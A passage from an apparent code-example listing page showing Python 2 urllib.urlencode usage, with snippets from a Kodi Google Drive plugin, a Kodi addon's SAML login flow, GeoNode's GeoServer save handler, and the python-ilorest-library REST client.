            infolabels = decode_dict({ 'title' : package.file.displayTitle() , 'plot' : package.file.plot })
            listitem.setInfo('Pictures', infolabels)
            playbackURL = '?mode=photo'
            listitem.setProperty('IsPlayable', 'false')

        # otherwise, assume video
        else:
            infolabels = decode_dict({ 'title' : package.file.displayTitle() , 'plot' : package.file.plot, 'size' : package.file.size })
            listitem.setInfo('Video', infolabels)
            playbackURL = '?mode=video'
            if self.integratedPlayer:
                listitem.setProperty('IsPlayable', 'false')
            else:
                listitem.setProperty('IsPlayable', 'true')
            if float(package.file.resume) > 0:
                listitem.setProperty('isResumable', 1)

        listitem.setProperty('fanart_image', package.file.fanart)


        cm=[]

        try:
            url = package.getMediaURL()
            cleanURL = re.sub('---', '', url)
            cleanURL = re.sub('&', '---', cleanURL)
        except:
            cleanURL = ''

    #    url = PLUGIN_URL+playbackURL+'&title='+package.file.title+'&filename='+package.file.id+'&instance='+str(self.instanceName)+'&folder='+str(package.folder.id)
        if encfs:
            values = {'instance': self.instanceName, 'dpath': dpath, 'epath': epath, 'encfs': 'true', 'title': package.file.title, 'filename': package.file.id, 'folder': package.folder.id}
        else:
            values = {'instance': self.instanceName, 'title': package.file.title, 'filename': package.file.id, 'folder': package.folder.id}
        url = self.PLUGIN_URL+ str(playbackURL)+ '&' + urllib.urlencode(values)

        if (contextType != 'image' and package.file.type != package.file.PICTURE):
            valuesBS = {'username': self.authorization.username, 'title': package.file.title, 'filename': package.file.id, 'content_type': 'video'}
            cm.append(( self.addon.getLocalizedString(30042), 'XBMC.RunPlugin('+self.PLUGIN_URL+'?mode=buildstrm&type='+str(package.file.type)+'&'+urllib.urlencode(valuesBS)+')', ))

            if (self.protocol == 2):
                # play-original for video only
                if (contextType == 'video'):
                    if self.settings.promptQuality:
                        cm.append(( self.addon.getLocalizedString(30123), 'XBMC.RunPlugin('+url + '&original=true'+')', ))
                    else:
                        cm.append(( self.addon.getLocalizedString(30151), 'XBMC.RunPlugin('+url + '&promptquality=true'+')', ))

                    # if the options are disabled in settings, display option to playback with feature
                    if not self.settings.srt:
                        cm.append(( self.addon.getLocalizedString(30138), 'XBMC.RunPlugin('+url + '&srt=true'+')', ))
                    if not self.settings.cc:
                        cm.append(( self.addon.getLocalizedString(30146), 'XBMC.RunPlugin('+url + '&cc=true'+')', ))

                    cm.append(( self.addon.getLocalizedString(30147), 'XBMC.RunPlugin('+url + '&seek=true'+')', ))
#                    cm.append(( self.addon.getLocalizedString(30148), 'XBMC.RunPlugin('+url + '&resume=true'+')', ))
#                    values = {'instance': self.instanceName, 'folder': package.folder.id}
#                    folderurl = self.PLUGIN_URL+ str(playbackURL)+ '&' + urllib.urlencode(values)
#                    cm.append(( 'folder', 'XBMC.RunPlugin('+folderurl+')', ))

                if contextType != 'image':
                    # download
                    cm.append(( self.addon.getLocalizedString(30113), 'XBMC.RunPlugin('+url + '&download=true'+')', ))

                    # download + watch
                    cm.append(( self.addon.getLocalizedString(30124), 'XBMC.RunPlugin('+url + '&play=true&download=true'+')', ))

#                    # watch downloaded copy
#                    cm.append(( self.addon.getLocalizedString(30125), 'XBMC.RunPlugin('+url + '&cache=true'+')', ))


        elif package.file.type ==  package.file.PICTURE: #contextType == 'image':

                cm.append(( self.addon.getLocalizedString(30126), 'XBMC.RunPlugin('+self.PLUGIN_URL+ '?mode=slideshow&' + urllib.urlencode(values)+')', ))

        #encfs
#        if (self.protocol == 2):
#            cm.append(( self.addon.getLocalizedString(30130), 'XBMC.RunPlugin('+self.PLUGIN_URL+ '?mode=downloadfolder&encfs=true&' + urllib.urlencode(values)+'&content_type='+contextType+')', ))


        url = url + '&content_type='+contextType

        #    listitem.addContextMenuItems( commands )
        #    if cm:
        if  package.file.type ==  package.file.PICTURE: #contextType == 'image':
            listitem.addContextMenuItems(cm, True)
        else:
            listitem.addContextMenuItems(cm, False)

        xbmcplugin.addDirectoryItem(plugin_handle, url, listitem,
                                isFolder=False, totalItems=0)
        return url

Example 8

Project: GDrive-for-KODI
Source File: gSpreadsheets.py
View license
    def updateMediaPackage(self,url, package1=None, criteria=''):

        if package1 is not None and (package1.file is None or package1.file.id is None) and package1.folder is not None and package1.folder.id is not None:
            params = urllib.urlencode({'folderid':  package1.folder.id})
        elif package1 is not None and (package1.file is None or package1.file.id is not None) and package1.folder is not None and package1.folder.id is not None and  package1.folder.id != '' :
            params = str(urllib.urlencode({'folderid':  package1.folder.id})) +'%20or%20'+ str(urllib.urlencode({'fileid':  package1.file.id}))
        elif package1 is not None and package1.file is not None and package1.file.id is not None:
            params = urllib.urlencode({'fileid':  package1.file.id})
        elif package1 is None and criteria == 'library':
            params = 'foldername!=""&orderby=column:folderid'
        elif package1 is None and criteria == 'queued':
            params = 'folderid=QUEUED&orderby=column:order'
        elif package1 is None and criteria == 'recentwatched':
            from datetime import date, timedelta
            updated = str((date.today() - timedelta(1)).strftime("%Y%m%d%H%M"))
            params = 'folderid!=QUEUED%20and%20watched!=""%20and%20watched>0%20and%20updated>='+updated
        elif package1 is None and criteria == 'recentstarted':
            from datetime import date, timedelta
            updated = str((date.today() - timedelta(1)).strftime("%Y%m%d%H%M"))
            params = 'folderid!=QUEUED%20and%20watched=""%20and%20resume>0%20and%20updated>='+updated
        else:
            return
        url = url + '?sq=' + params
       #url = url + '?tq=' + params


        mediaList = []
        while True:
            req = urllib2.Request(url, None, self.service.getHeadersList())

            try:
                response = urllib2.urlopen(req)
            except urllib2.URLError, e:
              if e.code == 403 or e.code == 401:
                self.service.refreshToken()
                req = urllib2.Request(url, None, self.service.getHeadersList())
                try:
                    response = urllib2.urlopen(req)
                except urllib2.URLError, e:
                    xbmc.log(self.addon.getAddonInfo('name') + ': ' + str(e), xbmc.LOGERROR)
                    return
              else:
                xbmc.log(self.addon.getAddonInfo('name') + ': ' + str(e), xbmc.LOGERROR)
                return

            response_data = response.read()

            previous = ''
            append = True
#            for r in re.finditer('<gsx:folderid>([^<]*)</gsx:folderid><gsx:foldername>([^<]*)</gsx:foldername><gsx:fileid>([^<]*)</gsx:fileid><gsx:filename>([^<]*)</gsx:filename><gsx:nfo>([^<]*)</gsx:nfo><gsx:order>([^<]*)</gsx:order><gsx:watched>([^<]*)</gsx:watched><gsx:resume>([^<]*)</gsx:resume>' ,
            for r in re.finditer('<entry>(.*?)</entry>' ,
                             response_data, re.DOTALL):

                #media = r.groups()
                entry = r.group()
                #exp = re.compile('<gsx:([^\>]+)>(.*)</gsx')
                #exp = re.compile('<gsx:([^\>]+)>([^<]+)</')
                exp = re.compile('<gsx:([^\>]+)>([^<]+)</gsx')
                if package1 is None:
                    newPackage = package.package( file.file('', '', '', self.service.MEDIA_TYPE_VIDEO, '',''),folder.folder('',''))
                else:
                    newPackage = package1


                for media in exp.finditer(entry):
                    # not a general folder ID but another file ID
                    if media.group(1) == 'fileid' and newPackage.file.id != '' and newPackage.file.id != media.group(2) and media.group(2) != '':
                        break
                    elif media.group(1) == 'folderid':
                        newPackage.folder.id = media.group(2)
                    elif media.group(1) == 'foldername':
                        newPackage.folder.title = media.group(2)
                        newPackage.folder.displaytitle = media.group(2)

                        if  criteria == 'library':
                            newPackage.file = None
                            if previous == newPackage.folder.id:
                                append = False
                            else:
                                append = True
                                previous = newPackage.folder.id
                            break

                    elif media.group(1) == 'watched':
                        if  media.group(2) == '':
                            newPackage.file.playcount = 0
                        else:
                            newPackage.file.playcount =  media.group(2)

                    elif media.group(1) == 'resume':
                        if  media.group(2) == '':
                            newPackage.file.resume = 0
                        else:
                            newPackage.file.resume = media.group(2)
                    elif media.group(1) == 'commands':
                        newPackage.file.commands = media.group(2)
                    elif media.group(1) == 'nfo':
                        nfoInfo = media.group(2)
                        nfoInfo = re.sub('<', '<', nfoInfo)
                        nfoInfo = re.sub('/\s?>', '> </>', nfoInfo)
                        nfoInfo = re.sub('>', '>', nfoInfo)
                        nfo = re.compile('<([^\>]+)>([^\<]*)</')
                        for info in nfo.finditer(nfoInfo):
                            if info.group(1) == 'title':
                                newPackage.file.title = info.group(2)
                            elif info.group(1) == 'premiered' or info.group(1) == 'year':
                                newPackage.file.date = info.group(2)
                            elif info.group(1) == 'plot' or info.group(1) == 'description':
                                newPackage.file.plot = info.group(2)
                            elif info.group(1) == 'actors':
                                newPackage.file.cast = info.group(2)
                    elif media.group(1) == 'fanart':
                        newPackage.file.fanart = self.service.API_URL +'files/' + str(media.group(2)) + '?alt=media' + '|' + self.service.getHeadersEncoded()

                    elif media.group(1) == 'fileid':
                        newPackage.file.id = media.group(2)
                    elif media.group(1) == 'filename':
                        newPackage.file.title = media.group(2)

                if append:
                    mediaList.append(newPackage)
            nextURL = ''
            for r in re.finditer('<link rel=\'next\' type=\'[^\']+\' href=\'([^\']+)\'' ,
                             response_data, re.DOTALL):
                nextURL = r.groups()

            response.close()

            if nextURL == '':
                break
            else:
                url = nextURL[0]


        return mediaList

Example 9

View license
    def LOGIN(self, saml_request, relay_state, saml_submit_url):
        ###################################################################
        #Post SAML Request & Relay State to get requestId
        ###################################################################       

        url = 'https://adobe.auth-gateway.net/saml/saml2/idp/SSOService.php'

        #cj = cookielib.LWPCookieJar()
        cj = cookielib.LWPCookieJar(os.path.join(ADDON_PATH_PROFILE, 'cookies.lwp'))
        cj.load(os.path.join(ADDON_PATH_PROFILE, 'cookies.lwp'),ignore_discard=True)
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))    
        opener.addheaders = [ ("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"),
                            ("Accept-Encoding", "deflate"),
                            ("Accept-Language", "en-us"),
                            ("Content-Type", "application/x-www-form-urlencoded"),                            
                            ("Connection", "keep-alive"),
                            ("Origin", "https://sp.auth.adobe.com"),
                            ("Referer", IDP_URL),
                            ("User-Agent", UA_IPHONE)]

        
        data = urllib.urlencode({'SAMLRequest' : saml_request,
                                   'RelayState' : relay_state
                                   })
        
        
        resp = opener.open(url, data)
        print resp.getcode()
        print resp.info()
        print "URL"
        print resp.geturl()
        last_url = resp.geturl()
        idp_source = resp.read()
        resp.close()
        SAVE_COOKIE(cj)        
        

        #cj = cookielib.LWPCookieJar()
        cj = cookielib.LWPCookieJar(os.path.join(ADDON_PATH_PROFILE, 'cookies.lwp'))
        cj.load(os.path.join(ADDON_PATH_PROFILE, 'cookies.lwp'),ignore_discard=True)
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))    
        opener.addheaders = [ ("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"),
                            ("Accept-Encoding", "deflate"),
                            ("Accept-Language", "en-us"),
                            ("Content-Type", "application/x-www-form-urlencoded"),                            
                            ("Connection", "keep-alive"),
                            ("Origin", "https://sp.auth.adobe.com"),
                            ("Referer", last_url),
                            ("User-Agent", UA_IPHONE)]

        


        
        resp = opener.open(last_url+"&history=1")
        print resp.getcode()
        print resp.info()
        print "URL"
        print resp.geturl()
        last_url = resp.geturl()
        idp_source = resp.read()
        resp.close()
        SAVE_COOKIE(cj)  



        #######################################################
        # firstbookend
        #######################################################

        cj = cookielib.LWPCookieJar(os.path.join(ADDON_PATH_PROFILE, 'cookies.lwp'))
        cj.load(os.path.join(ADDON_PATH_PROFILE, 'cookies.lwp'),ignore_discard=True)
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))    
        opener.addheaders = [ ("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"),
                            ("Accept-Encoding", "deflate"),
                            ("Accept-Language", "en-us"),
                            ("Content-Type", "application/x-www-form-urlencoded"),                            
                            ("Connection", "keep-alive"),                            
                            ("Referer", last_url),
                            ("User-Agent", UA_IPHONE)]

        
        resp = opener.open(last_url+"&history=1")
        print resp.getcode()
        print resp.info()
        print "URL"
        print resp.geturl()
        idp_source = resp.read()
        resp.close()
        SAVE_COOKIE(cj) 

     

        #request_id = FIND(idp_source,'<input type="hidden" name="requestId" value="','"')
        params = FIND(idp_source,'<input id="brandingParams" type="hidden" name="params" value="','"')



    
        ###################################################################
        #Post username and password       
        ###################################################################

        cj = cookielib.LWPCookieJar(os.path.join(ADDON_PATH_PROFILE, 'cookies.lwp'))
        cj.load(os.path.join(ADDON_PATH_PROFILE, 'cookies.lwp'),ignore_discard=True)

        url = 'https://auth.api.sonyentertainmentnetwork.com/login.do'        
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))    
        opener.addheaders = [ ("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"),
                            ("Accept-Encoding", "deflate"),
                            ("Accept-Language", "en-us"),
                            ("Content-Type", "application/x-www-form-urlencoded"),                            
                            ("Connection", "keep-alive"),
                            ("Origin", "https://auth.api.sonyentertainmentnetwork.com"),
                            ("Referer", "https://auth.api.sonyentertainmentnetwork.com/login.jsp?service_entity=psn&mid=nbcsports&request_theme=liquid"),
                            ("User-Agent", UA_IPHONE)]

        
        login_data = urllib.urlencode({'params' : params,
                                       'j_username' : USERNAME,
                                       'j_password' : PASSWORD
                                     })
        
        #try:
        resp = opener.open(url, login_data)
        print resp.getcode()
        print resp.info()
        idp_source = resp.read()            
        resp.close()
        SAVE_COOKIE(cj) 

        url = FIND(idp_source,'<meta http-equiv="refresh" content="0;url=','"')

        #######################################################
        # sony DiscoveryAssociationsResume
        #######################################################

        cj = cookielib.LWPCookieJar(os.path.join(ADDON_PATH_PROFILE, 'cookies.lwp'))
        cj.load(os.path.join(ADDON_PATH_PROFILE, 'cookies.lwp'),ignore_discard=True)
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))    
        opener.addheaders = [ ("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"),
                            ("Accept-Encoding", "deflate"),
                            ("Accept-Language", "en-us"),
                            ("Content-Type", "application/x-www-form-urlencoded"),                            
                            ("Connection", "keep-alive"),                            
                            ("Referer", last_url),
                            ("User-Agent", UA_IPHONE)]

        
        resp = opener.open(url)
        print resp.getcode()
        print resp.info()
        print "URL"
        print resp.geturl()
        idp_source = resp.read()
        last_url = resp.geturl()
        resp.close()
        SAVE_COOKIE(cj) 


        #######################################################
        # sony lastbookend
        #######################################################

        cj = cookielib.LWPCookieJar(os.path.join(ADDON_PATH_PROFILE, 'cookies.lwp'))
        cj.load(os.path.join(ADDON_PATH_PROFILE, 'cookies.lwp'),ignore_discard=True)
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))    
        opener.addheaders = [ ("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"),
                            ("Accept-Encoding", "deflate"),
                            ("Accept-Language", "en-us"),
                            ("Content-Type", "application/x-www-form-urlencoded"),                            
                            ("Connection", "keep-alive"),                            
                            ("Referer", last_url),
                            ("User-Agent", UA_IPHONE)]
        

        resp = opener.open(last_url+"&history=3")
        print resp.getcode()
        print resp.info()
        print "URL"
        print resp.geturl()            
        idp_source = resp.read()
        last_url = resp.geturl()
        resp.close()
        SAVE_COOKIE(cj) 

        saml_response = FIND(idp_source,'<input type="hidden" name="SAMLResponse" value="','"') 
        saml_response = HTMLParser.HTMLParser().unescape(saml_response)        
        url = FIND(idp_source,'<form method="post" action="','"')
       
        #except:
        #saml_response = ""
        #relay_state = ""

        #######################################################
        # adobe saml module.php
        #######################################################
        cj = cookielib.LWPCookieJar(os.path.join(ADDON_PATH_PROFILE, 'cookies.lwp'))
        cj.load(os.path.join(ADDON_PATH_PROFILE, 'cookies.lwp'),ignore_discard=True)
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))    
        opener.addheaders = [ ("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"),
                            ("Accept-Encoding", "deflate"),
                            ("Accept-Language", "en-us"),
                            ("Content-Type", "application/x-www-form-urlencoded"),                            
                            ("Connection", "keep-alive"),                            
                            ("Referer", last_url),
                            ("User-Agent", UA_IPHONE)]
        

        data = urllib.urlencode({'SAMLResponse' : saml_response})

        resp = opener.open(url,data)
        print resp.getcode()
        print resp.info()
        print "URL"
        print resp.geturl()            
        idp_source = resp.read()
        last_url = resp.geturl()
        resp.close()
        SAVE_COOKIE(cj) 



        url = FIND(idp_source,'<meta http-equiv="refresh" content="0;url=','"')

        #######################################################
        # adobe DiscoveryAssociationsResume
        #######################################################
        cj = cookielib.LWPCookieJar(os.path.join(ADDON_PATH_PROFILE, 'cookies.lwp'))
        cj.load(os.path.join(ADDON_PATH_PROFILE, 'cookies.lwp'),ignore_discard=True)
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))    
        opener.addheaders = [ ("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"),
                            ("Accept-Encoding", "deflate"),
                            ("Accept-Language", "en-us"),
                            ("Content-Type", "application/x-www-form-urlencoded"),                            
                            ("Connection", "keep-alive"),                            
                            ("Referer", last_url),
                            ("User-Agent", UA_IPHONE)]
        

        resp = opener.open(url)        
        idp_source = resp.read()
        last_url = resp.geturl()
        resp.close()
        SAVE_COOKIE(cj) 


        #######################################################
        # adobe lastbookend
        #######################################################

        cj = cookielib.LWPCookieJar(os.path.join(ADDON_PATH_PROFILE, 'cookies.lwp'))
        cj.load(os.path.join(ADDON_PATH_PROFILE, 'cookies.lwp'),ignore_discard=True)
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))    
        opener.addheaders = [ ("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"),
                            ("Accept-Encoding", "deflate"),
                            ("Accept-Language", "en-us"),
                            ("Content-Type", "application/x-www-form-urlencoded"),                            
                            ("Connection", "keep-alive"),                            
                            ("Referer", last_url),
                            ("User-Agent", UA_IPHONE)]
        

        resp = opener.open(last_url+"&history=4")
        print resp.getcode()
        print resp.info()
        print "URL"
        print resp.geturl()            
        idp_source = resp.read()
        last_url = resp.geturl()
        resp.close()
        SAVE_COOKIE(cj) 


        saml_response = FIND(idp_source,'<input type="hidden" name="SAMLResponse" value="','"') 
        saml_response = HTMLParser.HTMLParser().unescape(saml_response)        
        relay_state = FIND(idp_source,'<input type="hidden" name="RelayState" value="','"')
        #Set Global header fields         
        global ORIGIN
        global REFERER

        ORIGIN = 'https://adobe.auth-gateway.net'        
        REFERER = last_url
        print saml_response

        return saml_response, relay_state

Example 10

Project: geonode
Source File: signals.py
View license
def geoserver_post_save(instance, sender, **kwargs):
    """Save keywords to GeoServer

       The way keywords are implemented requires the layer
       to be saved to the database before accessing them.
    """

    if type(instance) is ResourceBase:
        if hasattr(instance, 'layer'):
            instance = instance.layer
        else:
            return

    if instance.storeType == "remoteStore":
        # Save layer attributes
        set_attributes_from_geoserver(instance)
        return

    if not getattr(instance, 'gs_resource', None):
        try:
            gs_resource = gs_catalog.get_resource(
                instance.name,
                store=instance.store,
                workspace=instance.workspace)
        except socket_error as serr:
            if serr.errno != errno.ECONNREFUSED:
                # Not the error we are looking for, re-raise
                raise serr
            # If the connection is refused, take it easy.
            return
    else:
        gs_resource = instance.gs_resource

    if gs_resource is None:
        return

    if settings.RESOURCE_PUBLISHING:
        if instance.is_published != gs_resource.advertised:
            if getattr(ogc_server_settings, "BACKEND_WRITE_ENABLED", True):
                gs_resource.advertised = instance.is_published
                gs_catalog.save(gs_resource)

    if any(instance.keyword_list()):
        gs_resource.keywords = instance.keyword_list()
        # gs_resource should only be called if
        # ogc_server_settings.BACKEND_WRITE_ENABLED == True
        if getattr(ogc_server_settings, "BACKEND_WRITE_ENABLED", True):
            gs_catalog.save(gs_resource)

    bbox = gs_resource.latlon_bbox
    dx = float(bbox[1]) - float(bbox[0])
    dy = float(bbox[3]) - float(bbox[2])

    dataAspect = 1 if dy == 0 else dx / dy

    height = 550
    width = int(height * dataAspect)

    # Set download links for WMS, WCS or WFS and KML
    links = wms_links(ogc_server_settings.public_url + 'wms?',
                      instance.typename.encode('utf-8'), instance.bbox_string,
                      instance.srid, height, width)

    for ext, name, mime, wms_url in links:
        Link.objects.get_or_create(resource=instance.resourcebase_ptr,
                                   name=ugettext(name),
                                   defaults=dict(
                                       extension=ext,
                                       url=wms_url,
                                       mime=mime,
                                       link_type='image',
                                   )
                                   )

    if instance.storeType == "dataStore":
        links = wfs_links(
            ogc_server_settings.public_url +
            'wfs?',
            instance.typename.encode('utf-8'))
        for ext, name, mime, wfs_url in links:
            if mime == 'SHAPE-ZIP':
                name = 'Zipped Shapefile'
            Link.objects.get_or_create(resource=instance.resourcebase_ptr,
                                       url=wfs_url,
                                       defaults=dict(
                                           extension=ext,
                                           name=name,
                                           mime=mime,
                                           url=wfs_url,
                                           link_type='data',
                                       )
                                       )

        gs_store_type = gs_resource.store.type.lower() if gs_resource.store.type else None
        geogig_repository = gs_resource.store.connection_parameters.get('geogig_repository', '')
        geogig_repo_name = geogig_repository.replace('geoserver://', '')

        if gs_store_type == 'geogig' and geogig_repo_name:

            repo_url = '{url}geogig/repos/{repo_name}'.format(
                url=ogc_server_settings.public_url,
                repo_name=geogig_repo_name)

            path = gs_resource.dom.findall('nativeName')

            if path:
                path = 'path={path}'.format(path=path[0].text)

            Link.objects.get_or_create(resource=instance.resourcebase_ptr,
                                       url=repo_url,
                                       defaults=dict(extension='html',
                                                     name='Clone in GeoGig',
                                                     mime='text/xml',
                                                     link_type='html'
                                                     )
                                       )

            def command_url(command):
                return "{repo_url}/{command}.json?{path}".format(repo_url=repo_url,
                                                                 path=path,
                                                                 command=command)

            Link.objects.get_or_create(resource=instance.resourcebase_ptr,
                                       url=command_url('log'),
                                       defaults=dict(extension='json',
                                                     name='GeoGig log',
                                                     mime='application/json',
                                                     link_type='html'
                                                     )
                                       )

            Link.objects.get_or_create(resource=instance.resourcebase_ptr,
                                       url=command_url('statistics'),
                                       defaults=dict(extension='json',
                                                     name='GeoGig statistics',
                                                     mime='application/json',
                                                     link_type='html'
                                                     )
                                       )

    elif instance.storeType == 'coverageStore':

        links = wcs_links(ogc_server_settings.public_url + 'wcs?',
                          instance.typename.encode('utf-8'))

    for ext, name, mime, wcs_url in links:
        Link.objects.get_or_create(resource=instance.resourcebase_ptr,
                                   url=wcs_url,
                                   defaults=dict(
                                       extension=ext,
                                       name=name,
                                       mime=mime,
                                       link_type='data',
                                   )
                                   )

    kml_reflector_link_download = ogc_server_settings.public_url + "wms/kml?" + \
        urllib.urlencode({'layers': instance.typename.encode('utf-8'), 'mode': "download"})

    Link.objects.get_or_create(resource=instance.resourcebase_ptr,
                               url=kml_reflector_link_download,
                               defaults=dict(
                                   extension='kml',
                                   name="KML",
                                   mime='text/xml',
                                   link_type='data',
                               )
                               )

    kml_reflector_link_view = ogc_server_settings.public_url + "wms/kml?" + \
        urllib.urlencode({'layers': instance.typename.encode('utf-8'), 'mode': "refresh"})

    Link.objects.get_or_create(resource=instance.resourcebase_ptr,
                               url=kml_reflector_link_view,
                               defaults=dict(
                                   extension='kml',
                                   name="View in Google Earth",
                                   mime='text/xml',
                                   link_type='data',
                               )
                               )

    html_link_url = '%s%s' % (
        settings.SITEURL[:-1], instance.get_absolute_url())

    Link.objects.get_or_create(resource=instance.resourcebase_ptr,
                               url=html_link_url,
                               defaults=dict(
                                   extension='html',
                                   name=instance.typename,
                                   mime='text/html',
                                   link_type='html',
                               )
                               )

    params = {
        'layers': instance.typename.encode('utf-8'),
        'format': 'image/png8',
        'width': 200,
        'height': 150,
        'TIME': '-99999999999-01-01T00:00:00.0Z/99999999999-01-01T00:00:00.0Z'

    }

    # Avoid using urllib.urlencode here because it breaks the url.
    # commas and slashes in values get encoded and then cause trouble
    # with the WMS parser.
    p = "&".join("%s=%s" % item for item in params.items())

    thumbnail_remote_url = ogc_server_settings.PUBLIC_LOCATION + \
        "wms/reflect?" + p

    thumbnail_create_url = ogc_server_settings.LOCATION + \
        "wms/reflect?" + p

    create_thumbnail(instance, thumbnail_remote_url, thumbnail_create_url, ogc_client=http_client)

    legend_url = ogc_server_settings.PUBLIC_LOCATION + \
        'wms?request=GetLegendGraphic&format=image/png&WIDTH=20&HEIGHT=20&LAYER=' + \
        instance.typename + '&legend_options=fontAntiAliasing:true;fontSize:12;forceLabels:on'

    Link.objects.get_or_create(resource=instance.resourcebase_ptr,
                               url=legend_url,
                               defaults=dict(
                                   extension='png',
                                   name='Legend',
                                   url=legend_url,
                                   mime='image/png',
                                   link_type='image',
                               )
                               )

    ogc_wms_path = '%s/wms' % instance.workspace
    ogc_wms_url = urljoin(ogc_server_settings.public_url, ogc_wms_path)
    ogc_wms_name = 'OGC WMS: %s Service' % instance.workspace
    Link.objects.get_or_create(resource=instance.resourcebase_ptr,
                               url=ogc_wms_url,
                               defaults=dict(
                                   extension='html',
                                   name=ogc_wms_name,
                                   url=ogc_wms_url,
                                   mime='text/html',
                                   link_type='OGC:WMS',
                               )
                               )

    if instance.storeType == "dataStore":
        ogc_wfs_path = '%s/wfs' % instance.workspace
        ogc_wfs_url = urljoin(ogc_server_settings.public_url, ogc_wfs_path)
        ogc_wfs_name = 'OGC WFS: %s Service' % instance.workspace
        Link.objects.get_or_create(resource=instance.resourcebase_ptr,
                                   url=ogc_wfs_url,
                                   defaults=dict(
                                       extension='html',
                                       name=ogc_wfs_name,
                                       url=ogc_wfs_url,
                                       mime='text/html',
                                       link_type='OGC:WFS',
                                   )
                                   )

    if instance.storeType == "coverageStore":
        ogc_wcs_path = '%s/wcs' % instance.workspace
        ogc_wcs_url = urljoin(ogc_server_settings.public_url, ogc_wcs_path)
        ogc_wcs_name = 'OGC WCS: %s Service' % instance.workspace
        Link.objects.get_or_create(resource=instance.resourcebase_ptr,
                                   url=ogc_wcs_url,
                                   defaults=dict(
                                       extension='html',
                                       name=ogc_wcs_name,
                                       url=ogc_wcs_url,
                                       mime='text/html',
                                       link_type='OGC:WCS',
                                   )
                                   )

    # remove links that belong to and old address

    for link in instance.link_set.all():
        if not urlparse(
            settings.SITEURL).hostname == urlparse(
            link.url).hostname and not urlparse(
            ogc_server_settings.public_url).hostname == urlparse(
                link.url).hostname:
            link.delete()

    # Define the link after the cleanup, we should use this more rather then remove
    # potential parasites
    tile_url = ('%sgwc/service/gmaps?' % ogc_server_settings.public_url +
                'layers=%s' % instance.typename.encode('utf-8') +
                '&zoom={z}&x={x}&y={y}' +
                '&format=image/png8'
                )

    link, created = Link.objects.get_or_create(resource=instance.resourcebase_ptr,
                                               extension='tiles',
                                               name="Tiles",
                                               mime='image/png',
                                               link_type='image',
                                               )
    if created:
        Link.objects.filter(pk=link.pk).update(url=tile_url)

    # Save layer attributes
    set_attributes_from_geoserver(instance)

    # Save layer styles
    set_styles(instance, gs_catalog)
    # NOTTODO by simod: we should not do this!
    # need to be removed when fixing #2015
    from geonode.catalogue.models import catalogue_post_save
    from geonode.layers.models import Layer
    catalogue_post_save(instance, Layer)

Example 11

Project: python-ilorest-library
Source File: v1.py
View license
    def _rest_request(self, path, method='GET', args=None, body=None, \
                    headers=None, optionalpassword=None, providerheader=None):
        """Rest request main function

        :param path: path within tree
        :type path: str
        :param method: method to be implemented
        :type method: str
        :param args: the arguments for method
        :type args: dict
        :param body: body payload for the rest call
        :type body: dict
        :param headers: provide additional headers
        :type headers: dict
        :param optionalpassword: provide password for authentication
        :type optionalpassword: str
        :param provideheader: provider id for the header
        :type providerheader: str
        :returns: returns a RestResponse object

        """
        headers = self._get_req_headers(headers, providerheader, \
                                                            optionalpassword)
        reqpath = path.replace('//', '/')

        if body is not None:
            if isinstance(body, dict) or isinstance(body, list):
                headers['Content-Type'] = u'application/json'
                body = json.dumps(body)
            else:
                headers['Content-Type'] = u'application/x-www-form-urlencoded'
                body = urllib.urlencode(body)

            if method == 'PUT':
                resp = self._rest_request(path=path)

                try:
                    if resp.getheader('content-encoding') == 'gzip':
                        buf = StringIO()
                        gfile = gzip.GzipFile(mode='wb', fileobj=buf)

                        try:
                            gfile.write(str(body))
                        finally:
                            gfile.close()

                        compresseddata = buf.getvalue()
                        if compresseddata:
                            data = bytearray()
                            data.extend(buffer(compresseddata))
                            body = data
                except BaseException as excp:
                    LOGGER.error('Error occur while compressing body: %s', excp)
                    raise

            headers['Content-Length'] = len(body)

        if args:
            if method == 'GET':
                reqpath += '?' + urllib.urlencode(args)
            elif method == 'PUT' or method == 'POST' or method == 'PATCH':
                headers['Content-Type'] = u'application/x-www-form-urlencoded'
                body = urllib.urlencode(args)

        restreq = RestRequest(reqpath, method=method, body=body)

        attempts = 0
        while attempts < self.MAX_RETRY:
            if logging.getLogger().isEnabledFor(logging.DEBUG):
                try:
                    LOGGER.debug('HTTP REQUEST: %s\n\tPATH: %s\n\tBODY: %s'% \
                                (restreq.method, restreq.path, restreq.body))
                except:
                    LOGGER.debug('HTTP REQUEST: %s\n\tPATH: %s\n\tBODY: %s'% \
                                (restreq.method, restreq.path, 'binary body'))
            attempts = attempts + 1
            LOGGER.info('Attempt %s of %s', attempts, path)

            try:
                while True:
                    if self._conn is None:
                        self.__init_connection()

                    self._conn.request(method.upper(), reqpath, body=body, \
                                                                headers=headers)
                    self._conn_count += 1

                    inittime = time.clock()
                    resp = self._conn.getresponse()
                    endtime = time.clock()
                    LOGGER.info('Response Time to %s: %s seconds.'% \
                                        (restreq.path, str(endtime-inittime)))

                    if resp.getheader('Connection') == 'close':
                        self.__destroy_connection()
                    if resp.status not in range(300, 399) or \
                                                            resp.status == 304:
                        break

                    newloc = resp.getheader('location')
                    newurl = urlparse2.urlparse(newloc)

                    reqpath = newurl.path
                    self.__init_connection(newurl)

                restresp = RestResponse(restreq, resp)

                try:
                    if restresp.getheader('content-encoding') == "gzip":
                        compressedfile = StringIO(restresp.text)
                        decompressedfile = gzip.GzipFile(fileobj=compressedfile)
                        restresp.text = decompressedfile.read()
                except Exception as excp:
